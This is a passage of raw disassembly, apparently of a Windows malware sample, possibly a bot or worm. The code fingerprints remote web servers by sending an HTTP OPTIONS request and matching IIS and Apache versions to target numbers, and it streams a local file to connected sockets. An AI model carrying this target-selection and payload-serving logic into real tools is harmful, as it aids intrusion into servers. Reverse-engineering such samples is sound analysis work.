cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; sub_412D56+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; sub_412D56+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, dword_41CCF6[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CCD0
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset dword_41DAB4
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: sub_41331E+148�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CC64
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: sub_41331E+165�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CC68
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: sub_41331E:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EB24
pop ebp
retn
sub_412D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D56 proc near ; DATA XREF: sub_412E04+CA�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jnz short loc_412D8A
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D56+25�j
lea eax, [ebp+var_44]
push eax
push [ebp+var_48]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412DAE
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D56+49�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: sub_412D56+63�j
push offset dword_41CC6C
push [ebp+var_8]
lea eax, [ebp+var_44]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: sub_412D56+32�j
; sub_412D56+56�j ...
leave
retn 4
sub_412D56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E04 proc near ; DATA XREF: sub_412F07+B0�o
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_1AA = byte ptr -1AAh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1B0]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412E59
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: sub_412E04+40�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_1B4]
push dword ptr [eax]
push offset dword_41CC70
lea eax, [ebp+var_1AA]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp+var_1B0]
push eax
push offset dword_41EB24
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: sub_412E04+B7�j
; sub_412E04:loc_412EEA�j
mov eax, [ebp+var_1B4]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: sub_412E04+95�j
push 3E8h
push [ebp+var_4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1B8], eax
cmp [ebp+var_1B8], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: sub_412E04+B5�j
cmp [ebp+var_1B8], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: sub_412E04+C0�j
push [ebp+var_1B8]
push offset sub_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push [ebp+var_1B8]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: sub_412E04+D8�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: sub_412E04+97�j
; sub_412E04+C2�j
push [ebp+var_4]
call sub_404CBB
pop ecx
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: sub_412E04+50�j
leave
retn 4
sub_412E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; sub_41349C+2C7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CCA8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: sub_4167F1+DA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, dword_41CCF6[ecx]
and ecx, 0FFh
mov eax, off_41CCFE[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov off_41CCFE[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and dword_41CCFA[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov dword_41CCF6[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp dword_41CCF6[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, dword_41CCF6[eax]
cmp eax, dword_41CCF6[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: sub_41331E+72�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
push offset dword_41CD90
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset dword_41CD88
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset dword_41CD80
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41331E proc near ; DATA XREF: sub_41349C+4EB�o
; sub_413CB3+27C�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push [ebp+arg_0]
lea eax, [ebp+var_14C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
push [ebp+var_10E]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push [ebp+var_10E]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: sub_41331E+4E�j
cmp [ebp+var_112], 0
jz short loc_4133B1
push [ebp+var_10E]
call sub_41308F
pop ecx
cmp [ebp+var_112], eax
jz short loc_4133B1
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_41331E+6A�j
; sub_41331E+7E�j
cmp [ebp+var_8A], 1
jnz short loc_4133E0
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_404552
pop ecx
pop ecx
push offset dword_41EF48
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: sub_41331E+9A�j
cmp [ebp+var_8A], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp+var_6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: sub_41331E+C9�j
call sub_412D4C
push eax
lea eax, [ebp+var_6]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EF48
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: sub_41331E+C0�j
; sub_41331E+100�j
lea eax, [ebp+var_14C]
push eax
